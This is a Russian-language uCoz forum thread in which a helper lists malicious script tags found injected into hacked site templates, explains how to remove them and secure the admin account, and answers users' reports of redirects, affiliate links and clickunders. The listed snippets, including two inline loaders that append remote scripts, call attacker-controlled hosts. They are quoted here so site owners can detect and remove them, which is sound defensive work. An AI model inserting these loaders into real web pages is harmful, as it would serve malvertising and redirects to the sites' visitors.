Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Если на вашем сайте появились порнобаннеры
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1 | 15:57:08
Если на вашем сайте постоянные перебросы на другие сайты или появляется куча всплывающих рекламных баннеров, порнобаннеров, то вы должны проверить код страниц на наличие следующих скриптов:

Код
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/207odofje1uzdl5/orororo.txt"></script>
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script>
<script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Актуальные на данный момент и самые распространенные эти скрипты

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://bobrilla.com/7h4p5qn4qhr8ee1ywr1nh01af3d31nbp'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://iqmasa.ru/6rzofz8uuc28ef8pehs6rx5nbidd8hra473w3yk0c1n9d39'></script>

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://fasterdir.ru/8v0n2hh3me45jvyxrtdyc4164r61v4ut'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>


Код
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobatori.com/6h3mo39hhqx8pibnjyshzo13skikuus5'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/68sb0mshp9b78t1epj44r8zi8bjocb9'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobmas.ru/s/948'></script>


Код

<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?818010=LmcuKHw4NjU5MTM-KWdrbm5oaG0';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>
<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?823389=KWApL3s_MTI-NjQ5LmBsaWlvb2U';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>



Как удалить:

1) Код как правило внедряется в шаблоны Страницы сайта. Модуль новости (все шаблоны) но могут быть варианты. Иногда код внедряется во все шаблоны сайта.
Прописывается в верхней части шаблона или в самом низу. Реже встречается в футере (глобальный блок Нижняя часть сайта)

2) Для удаления нужно воспользоваться функцией Быстрой замены. Для этого надо пройти в панель управления - Дизайн - Управление дизайном - Быстрая замена - В поле "Что заменить" вставляете скрипт (даже если внедрено много скриптов лучше удалять по одному) - Поле на что изменить оставляете пустым и производите замену во всех действующих модулях
Если скриптов много внедрено, можно попробовать многострочную замену по той же схеме
3) После очистки сайта от внедренного кода нужно обязательно сменить пароль uID профиля, которым администрируете сайт. Инструкция по изменению пароля находится тут //forum.ucoz.ru/forum/45-52299-1
4) Если после изменения uID пароля на новый сложный у вас снова и снова возникает проблема внедрения чужеродного кода, то выполните следующие инструкции:
1) создайте нового пользователя в панели управления сайтом: задайте ему Логин и сложнейший пароль
2) дайте созданному пользователю права администратора, а у бывшего uID профиля, которым администрировали сайт заберите права и переведите его в низшую группу
3) в общих настройках сайта поставьте старый Вид кнопки uID авторизации и далее администрируйте сайт локально
5) Если локальный способ администрирования для вас не подходит, то создайте в системе ещё один uID профиль, на котором не будет сайтов и прав управления ни одним из сайтов. И новый созданный профиль используйте для авторизации на сайтах системы uCoz с uID авторизацией. А uID профилем, которым вы администрируете сайт или сайты заходите только к себе на сайты и более никуда. И поставьте на uID пароль администратора сайта сложнейший пароль!
6) Заберите права доступа к админ бару другим администраторам и модераторам вашего сайта. не пускайте никого в панель управления сайтом
7) Будьте внимательны к письмам, которые приходят на вашу почту. Часто мошенники имитируют письма от вебсервиса uCoz, в которых просят вас пройти или верификацию или пройти по ссылкам, также просят ввод ваших данных (вебтоп пароль и пароль uID профиля или секретный вопрос и ответ). Если вы сомневаетесь в письме, которое вам пришло от имени сервиса, вы можете всегда спросить или на форуме в этой теме //forum.ucoz.ru/forum/45-46950-1 или перешлите его сразу на адрес abuse@ucoz.ru
Будьте всегда бдительны и следите за темой //forum.ucoz.ru/forum/45-35739-1


Если вы вообще ничего не поняли, но проблема появления всплывающих порнобаннеров и переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает (если есть переброс), а так же указать происходит это под логином или под гостем

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 106 | 19:43:36
defaultNick6422, снимите системную рекламу юкоз http://manual.ucoz.net/board/36-1-0-370

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
defaultNick6422
Сообщений: 3
Репутация: 0

Сообщение # 107 | 19:47:17
так это реклама от ucoz ?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 108 | 19:49:08
defaultNick6422, да

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
defaultNick6422
Сообщений: 3
Репутация: 0

Сообщение # 109 | 19:52:32
ну спасибо вы миня успокоили а то я думал что вредоносный код внедрен
Sindi3017
Сообщений: 1
Репутация: 0

Сообщение # 110 | 09:08:35
Здравствуйте. Помогите пожалуйста удалить чужую рекламу на сайте http://umeina5.ucoz.ru/. При авторизации перебрасывает на
http://jackpotgambling.net/bestvulkan/?p18528p45383p4eddt4813&source=d_feb&promo=u_Du1&utm_campaign=u_Du1&utm_source=u&utm_medium=indexu1&country=nogeo&campaign=u_Du1
Yuri_G
uWeb support
uVip manager
Сообщений: 4336
Репутация: 943

Сообщение # 111 | 11:54:58
Цитата Sindi3017 ()
Здравствуйте. Помогите пожалуйста удалить чужую рекламу на сайте http://umeina5.ucoz.ru/. При авторизации перебрасывает
проблема с вашей стороны я проверил никакого перенаправления нет, попробуйте очистить кешь, для этого воспользуйтесь програмой CCleaner

Макс4169
Сообщений: 3
Репутация: 0

Сообщение # 112 | 00:35:20
Помогите пожалуйста. Сегодня зашел на свой сайт юкоз, вот он: http://zarabatyvaysam.at.ua/ и увидел там в тексте силки на неизвестные сайты которых я не делал типа таких http://www.lightinthebox.com/ru/?utm_source=admitad&litb_from=affiliate_admitad&utm_medium=affiliate&utm_campaign=111914. Что делать подскажите Пожалуйста!!!! Я пробовал заменять через быструю замену выше изложены скрипты выдает ошибку Не сделано ни одной замены Проверьте правильность заменяемого кода.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 113 | 14:41:26
Макс4169, сделайте скрин того что вы видите

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Макс4169
Сообщений: 3
Репутация: 0

Сообщение # 114 | 16:06:33
а как закинуть скрин на форум? у меня не получается.
Yuri_G
uWeb support
uVip manager
Сообщений: 4336
Репутация: 943

Сообщение # 115 | 16:14:55
Цитата Макс4169 ()
а как закинуть скрин на форум? у меня не получается.
вы просто ссылку к сообщению добавьте и все

$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 116 | 16:21:54
Макс4169, права для группы изменены, можете использовать
Макс4169
Сообщений: 3
Репутация: 0

Сообщение # 117 | 16:35:48
Цитата webanet ()
сделайте скрин того что вы видите
Зайдите Пожалуйста на мой сайт: http://zarabatyvaysam.at.ua/ и сами все увидите на главной странице в название раздела"Как заработать в интернете" и подраздела "Как заработать в интернете без вложений" и в самом тексте прямо на словах,$IMAGE1$ пишу как на сайте: "Что Вы", "каждый день"(слова находятся на главной странице сайта в рубрике "Что же делать дальше") и ни только на них, а и на других словах появились силки на другие сайты типа таких: http://www.lightinthebox.com/ru/?utm_source=admitad&litb_from=affiliate_admitad&utm_medium=affiliate&utm_campaign=111914.
ПОМОГИТЕ ПОЖАЛУЙСТА. Что мне делать?
tolk_by
Сообщений: 12
Репутация: 0

Сообщение # 118 | 11:04:49
я уже писал практически тоже самое в соседней теме, там посоветовали удалить скрипт заочника, но проблема не решилась.
а именно на моем сайте открывается кликандер при клике по пустому месту любой странице.
всю рекламу, которую я вешал, убрал, кликандер все равно открывается.
что делать.

Добавлено (24 Мар 2014, 18:03:07)
---------------------------------------------
и сравните, вот реклама юкоза
скрин1
а вот то, что открывается при клике по пустому месту страницы
скрин2

сам этот факт, плюс нежелание поддержки, вот их последний ответ: "В условиях того, что проблема не повторяется. Проблему подтвердить было сложно. Что касается системного когда нашего веб-сервиса, то мною была допущена ошибка и дан не верный ответ."
особенно со словами "проблема не повторяется", хотя я несколько раз указывал обратное,
делаю вывод, что кликандер с моего сайта открывается при участии самих юкозевцев.
поисковики очень не любят, когда на сайте кликандеры, делайте выводы сами.

Добавлено (24 Мар 2014, 18:11:39)
---------------------------------------------

Цитата Ucoz_fan ()
попробуйте очистить кешь, для этого воспользуйтесь програмой CCleaner


никогда не используйте неизвестные и сомнительные программы, очистить кэш можно сочетанием клавиш Ctrl+Shift+Del

Добавлено (25 Мар 2014, 11:04:49)
---------------------------------------------
обидно, что даже никто не хочет ответить.
кликандер стабильно открывается на московском трафике и браузере Mozilla Firefox.
смотрел на хроме и IE, тоже открывается но не всегда.

0RJ0
Сообщений: 208
Репутация: 68

Сообщение # 119 | 22:38:52
tolk_by, посмотрите, нет ли у вас перед тегом <html> каких-либо строк или символов кода?
Сообщение отредактировал 0RJ0 - Вторник, 25 Мар 2014, 22:42:22
tolk_by
Сообщений: 12
Репутация: 0

Сообщение # 120 | 08:46:05
Цитата 0RJ0 ()
нет ли у вас перед тегом <html> каких-либо строк или символов кода?

там юкозовский код, при подчищенных куках появляется еще один скрипт, но меня в соседней теме убедили, что это тоже код системы, и поддержка, которая очень долго не могла этот код обнаружить и распознать, в конечном итоге признала, что это код системы юкоз.
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Поиск: